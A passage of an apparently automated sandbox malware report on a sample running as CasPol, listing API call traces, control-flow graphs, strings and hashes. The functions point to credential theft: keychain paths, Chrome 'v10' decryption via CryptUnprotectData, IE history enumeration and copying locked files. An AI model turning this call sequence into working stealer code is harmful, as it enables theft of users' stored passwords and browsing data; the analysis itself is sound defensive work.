                                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                    • API String ID: 2263259095-3798722523
                                                                                                                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                                    • API String ID: 2744995895-28296030
                                                                                                                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                    • String ID: chp$v10
                                                                                                                    • API String ID: 1297422669-2783969131
                                                                                                                    • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                    • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                    • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                    • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 free 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 602 413e6a-413e76 596->602 597->596 601 413e46-413e5c GetProcAddress 597->601 598->599 599->580 601->596 602->592 604->583
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                    • free.MSVCRT ref: 00413EC1
                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                    • API String ID: 1344430650-1740548384
                                                                                                                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                    • String ID: bhv
                                                                                                                    • API String ID: 4234240956-2689659898
                                                                                                                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                    • API String ID: 2941347001-70141382
                                                                                                                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 651 4467ac-4467b7 __setusermatherr 644->651 652 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->652 646->642 650 44674d-44674f 646->650 647->642 649 446734-44673b 647->649 649->642 653 44673d-446745 649->653 654 446755-446758 650->654 651->652 657 446810-446819 652->657 658 44681e-446825 652->658 653->654 654->644 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 669 446853-446864 GetStartupInfoW 662->669 670 44684d-446851 662->670 663->661 664->660 664->665 665->662 667 446840-446842 665->667 667->662 671 446866-44686a 669->671 672 446879-44687b 669->672 670->667 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2827331108-0
                                                                                                                    • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                    • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                    • String ID: visited:
                                                                                                                    • API String ID: 1157525455-1702587658
                                                                                                                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 free 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                    • free.MSVCRT ref: 0040E28B
                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                    • API String ID: 2804212203-2982631422
                                                                                                                    • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                    • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
